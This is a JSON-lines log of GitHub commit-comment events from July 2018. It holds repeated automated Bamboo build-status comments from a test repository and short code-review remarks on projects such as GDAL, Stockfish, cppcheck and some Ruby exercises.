{"id":"8014844224","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825427,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-25T08:06:39Z","updated_at":"2018-07-25T08:06:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:06:39Z"}
{"id":"8014845150","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29825429,"position":null,"line":null,"path":null,"commit_id":"58d8db3081d7e0a3ed62121b33a60283303d8880","created_at":"2018-07-25T08:06:51Z","updated_at":"2018-07-25T08:06:51Z","author_association":"MEMBER","body":"> checking this logfile does not seem to be a reliable mechanism.\r\n\r\nyeah, I'd be curious of knowing a (fast) way to know if a Linux machine is a GCE instance without attempting a network access. A workaround is to define the CPL_MACHINE_IS_GCE=YES environment variable"}},"created_at":"2018-07-25T08:06:51Z"}
{"id":"8014846238","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29825432,"position":null,"line":null,"path":null,"commit_id":"0aeb752cecff576dd376359397a5c9a919fca974","created_at":"2018-07-25T08:07:05Z","updated_at":"2018-07-25T08:07:05Z","author_association":"MEMBER","body":"Looks good.\r\n\r\nYou can probably use dbc:;affected_by to let simc automatically find out if a spell is affected by it. (Assuming its in spell data, but that is likely the case nowadays)"}},"created_at":"2018-07-25T08:07:05Z"}
{"id":"8014846414","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825434,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-25T08:07:08Z","updated_at":"2018-07-25T08:07:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:07:08Z"}
{"id":"8014847493","type":"CommitCommentEvent","actor":{"login":"Wesley-VanNeck"},"repo":{"name":"magicus/ProtocolSupport"},"payload":{"comment":{"id":29825435,"position":null,"line":null,"path":null,"commit_id":"4c28113bbfea6ff798b205dcb3a8bae980937001","created_at":"2018-07-25T08:07:22Z","updated_at":"2018-07-25T08:07:22Z","author_association":"NONE","body":"@magicus can fix the stairs plz"}},"created_at":"2018-07-25T08:07:22Z"}
{"id":"8014849698","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825437,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-25T08:07:52Z","updated_at":"2018-07-25T08:07:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:07:52Z"}
{"id":"8014851936","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825442,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-25T08:08:21Z","updated_at":"2018-07-25T08:08:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:08:21Z"}
{"id":"8014854881","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825446,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-25T08:09:01Z","updated_at":"2018-07-25T08:09:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:09:01Z"}
{"id":"8014857395","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825450,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-25T08:09:34Z","updated_at":"2018-07-25T08:09:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:09:34Z"}
{"id":"8014860032","type":"CommitCommentEvent","actor":{"login":"BTaskaya"},"repo":{"name":"exercism/go"},"payload":{"comment":{"id":29825455,"position":null,"line":null,"path":null,"commit_id":"9f503402a38f97129666c4f65a35bd4f6527e614","created_at":"2018-07-25T08:10:08Z","updated_at":"2018-07-25T08:10:08Z","author_association":"NONE","body":"+1 "}},"created_at":"2018-07-25T08:10:08Z"}
{"id":"8014860808","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825456,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-25T08:10:16Z","updated_at":"2018-07-25T08:10:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:10:16Z"}
{"id":"8014861638","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29825458,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T08:10:27Z","updated_at":"2018-07-25T08:10:27Z","author_association":"NONE","body":"@noobpwnftw Since you don't differentiate between which side-to-move it is, you sometimes assign -20 and sometimes +20 to the same side. And the static eval being exactly VALUE_DRAW is hardly ever the case."}},"created_at":"2018-07-25T08:10:27Z"}
{"id":"8014863118","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825460,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T08:10:46Z","updated_at":"2018-07-25T08:10:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:10:46Z"}
{"id":"8014865537","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"RodinaSN/Lesson2"},"payload":{"comment":{"id":29825464,"position":2,"line":13,"path":"Quadratic.rb","commit_id":"66e616feb0cd6b43ecb15d82f449781e8a17d793","created_at":"2018-07-25T08:11:17Z","updated_at":"2018-07-25T08:11:17Z","author_association":"NONE","body":"почему здесь не исправлено?"}},"created_at":"2018-07-25T08:11:17Z"}
{"id":"8014866022","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"RodinaSN/Lesson2"},"payload":{"comment":{"id":29825465,"position":10,"line":20,"path":"Quadratic.rb","commit_id":"66e616feb0cd6b43ecb15d82f449781e8a17d793","created_at":"2018-07-25T08:11:24Z","updated_at":"2018-07-25T08:11:24Z","author_association":"NONE","body":"и здесь "}},"created_at":"2018-07-25T08:11:24Z"}
{"id":"8014866445","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825466,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-25T08:11:29Z","updated_at":"2018-07-25T08:11:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:11:29Z"}
{"id":"8014867847","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"RodinaSN/Lesson2"},"payload":{"comment":{"id":29825469,"position":18,"line":19,"path":"pifagor.rb","commit_id":"66e616feb0cd6b43ecb15d82f449781e8a17d793","created_at":"2018-07-25T08:11:48Z","updated_at":"2018-07-25T08:11:48Z","author_association":"NONE","body":"puts почему на выравниваешь?"}},"created_at":"2018-07-25T08:11:48Z"}
{"id":"8014868561","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825470,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-25T08:11:56Z","updated_at":"2018-07-25T08:11:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:11:56Z"}
{"id":"8014872307","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825474,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T08:12:44Z","updated_at":"2018-07-25T08:12:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:12:44Z"}
{"id":"8014874322","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825480,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-25T08:13:09Z","updated_at":"2018-07-25T08:13:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:13:09Z"}
{"id":"8014875518","type":"CommitCommentEvent","actor":{"login":"blixit"},"repo":{"name":"ReliefApplications/notifications-bundle"},"payload":{"comment":{"id":29825484,"position":null,"line":null,"path":null,"commit_id":"b4d0046e76ddfe3d962f234ee99591c0010cf4fa","created_at":"2018-07-25T08:13:23Z","updated_at":"2018-07-25T08:13:23Z","author_association":"COLLABORATOR","body":"Fixes https://github.com/ReliefApplications/notifications-bundle/issues/1"}},"created_at":"2018-07-25T08:13:23Z"}
{"id":"8014876171","type":"CommitCommentEvent","actor":{"login":"justcla"},"repo":{"name":"justcla/HotTips"},"payload":{"comment":{"id":29825486,"position":null,"line":null,"path":null,"commit_id":"b0ffd126fc0e6f258d9f244b56a4cb2dca4a8e63","created_at":"2018-07-25T08:13:32Z","updated_at":"2018-07-25T08:13:32Z","author_association":"OWNER","body":"Good changes Sravanthi! Thanks."}},"created_at":"2018-07-25T08:13:32Z"}
{"id":"8014876388","type":"CommitCommentEvent","actor":{"login":"yamt"},"repo":{"name":"midonet/midonet"},"payload":{"comment":{"id":29825487,"position":38,"line":65,"path":"midolman/src/main/scala/org/midonet/midolman/management/Metering.scala","commit_id":"4aec3b372b54a6cf0e46e17bcb60fa4300407bb6","created_at":"2018-07-25T08:13:35Z","updated_at":"2018-07-25T08:13:35Z","author_association":"CONTRIBUTOR","body":"i think counter is ok as all our metrics here is the number of bytes or packets processed for a virtual device."}},"created_at":"2018-07-25T08:13:35Z"}
{"id":"8014877902","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825489,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-25T08:13:54Z","updated_at":"2018-07-25T08:13:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:13:54Z"}
{"id":"8014878040","type":"CommitCommentEvent","actor":{"login":"yamt"},"repo":{"name":"midonet/midonet"},"payload":{"comment":{"id":29825490,"position":58,"line":85,"path":"midolman/src/main/scala/org/midonet/midolman/management/Metering.scala","commit_id":"4aec3b372b54a6cf0e46e17bcb60fa4300407bb6","created_at":"2018-07-25T08:13:56Z","updated_at":"2018-07-25T08:13:56Z","author_association":"CONTRIBUTOR","body":"thank you. i filed a bug. https://midonet.atlassian.net/browse/MNA-1333"}},"created_at":"2018-07-25T08:13:56Z"}
{"id":"8014878184","type":"CommitCommentEvent","actor":{"login":"slmatthew"},"repo":{"name":"slmatthew/mysql-php"},"payload":{"comment":{"id":29825491,"position":null,"line":null,"path":null,"commit_id":"0d2bf796cf5b7a385a30980e906f181f84f96355","created_at":"2018-07-25T08:13:57Z","updated_at":"2018-07-25T08:13:57Z","author_association":"OWNER","body":"**README.md**"}},"created_at":"2018-07-25T08:13:57Z"}
{"id":"8014878577","type":"CommitCommentEvent","actor":{"login":"arijitlaik"},"repo":{"name":"rbeucher/UWGeodynamics"},"payload":{"comment":{"id":29825493,"position":null,"line":null,"path":null,"commit_id":"a1749cddf3936bcf5e121b4645c0f7bf05f2065f","created_at":"2018-07-25T08:14:03Z","updated_at":"2018-07-25T08:14:03Z","author_association":"CONTRIBUTOR","body":"finally, :) , leave outputs for the example please. "}},"created_at":"2018-07-25T08:14:03Z"}
{"id":"8014879808","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825511,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-25T08:14:18Z","updated_at":"2018-07-25T08:14:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:14:18Z"}
{"id":"8014882579","type":"CommitCommentEvent","actor":{"login":"mike0022"},"repo":{"name":"mike0022/Security-System"},"payload":{"comment":{"id":29825516,"position":null,"line":null,"path":null,"commit_id":"22a572934c7d9f938e70b85905c3dade60b5b664","created_at":"2018-07-25T08:14:55Z","updated_at":"2018-07-25T08:14:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [git](https://trello.com/c/j3aHy79j/79-git)"}},"created_at":"2018-07-25T08:14:55Z"}
{"id":"8014883310","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825519,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-25T08:15:05Z","updated_at":"2018-07-25T08:15:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:15:05Z"}
{"id":"8014883724","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29825520,"position":null,"line":null,"path":null,"commit_id":"e7069d28b3ccce66e3ad5729920a708f9cade080","created_at":"2018-07-25T08:15:10Z","updated_at":"2018-07-25T08:15:10Z","author_association":"OWNER","body":"@joergoster the behavior of biasing both sides is intended, and, how should I determine if (ss-1) is having a score of VALUE_DRAW?"}},"created_at":"2018-07-25T08:15:10Z"}
{"id":"8014884330","type":"CommitCommentEvent","actor":{"login":"justcla"},"repo":{"name":"justcla/HotTips"},"payload":{"comment":{"id":29825524,"position":38,"line":49,"path":"HotTips/TipOfTheDayWindow.xaml.cs","commit_id":"b0ffd126fc0e6f258d9f244b56a4cb2dca4a8e63","created_at":"2018-07-25T08:15:18Z","updated_at":"2018-07-25T08:15:18Z","author_association":"OWNER","body":"I don't think this is the right place to be setting the Vote icons. I suggest moving the setting of vote icons into the same place that sets the tip content/text. That way it's all done in one place.\r\nAlso, there is an issue that the icons will flicker if you set them to NoVote then they go back to Like or Dislike."}},"created_at":"2018-07-25T08:15:18Z"}
{"id":"8014885387","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825526,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-25T08:15:30Z","updated_at":"2018-07-25T08:15:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:15:30Z"}
{"id":"8014885468","type":"CommitCommentEvent","actor":{"login":"justcla"},"repo":{"name":"justcla/HotTips"},"payload":{"comment":{"id":29825527,"position":45,"line":55,"path":"HotTips/TipOfTheDayWindow.xaml.cs","commit_id":"b0ffd126fc0e6f258d9f244b56a4cb2dca4a8e63","created_at":"2018-07-25T08:15:32Z","updated_at":"2018-07-25T08:15:32Z","author_association":"OWNER","body":"I don't think this should be here."}},"created_at":"2018-07-25T08:15:32Z"}
{"id":"8014885944","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29825529,"position":14,"line":8,"path":"lesson1/idealniy_ves.rb","commit_id":"e887e70020486e1afe01a26a01e9b0af2f8daf6e","created_at":"2018-07-25T08:15:37Z","updated_at":"2018-07-25T08:15:37Z","author_association":"NONE","body":"здесь tab не поправила"}},"created_at":"2018-07-25T08:15:37Z"}
{"id":"8014887661","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29825530,"position":17,"line":11,"path":"lesson1/Right_triangl.rb","commit_id":"e887e70020486e1afe01a26a01e9b0af2f8daf6e","created_at":"2018-07-25T08:16:00Z","updated_at":"2018-07-25T08:16:00Z","author_association":"NONE","body":"почему разное выравнивание?"}},"created_at":"2018-07-25T08:16:00Z"}
{"id":"8014888247","type":"CommitCommentEvent","actor":{"login":"PKEuS"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29825534,"position":null,"line":null,"path":null,"commit_id":"d300d1f61b2b368a1cba64b6f33b1d0e870d9725","created_at":"2018-07-25T08:16:08Z","updated_at":"2018-07-25T08:16:08Z","author_association":"COLLABORATOR","body":"I do not know if this is a good idea. The code is certainly simpler, but less efficient, since two std::string instances have to be created (and destroyed again), involving allocation and deallocation."}},"created_at":"2018-07-25T08:16:08Z"}
{"id":"8014888944","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825535,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-25T08:16:17Z","updated_at":"2018-07-25T08:16:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 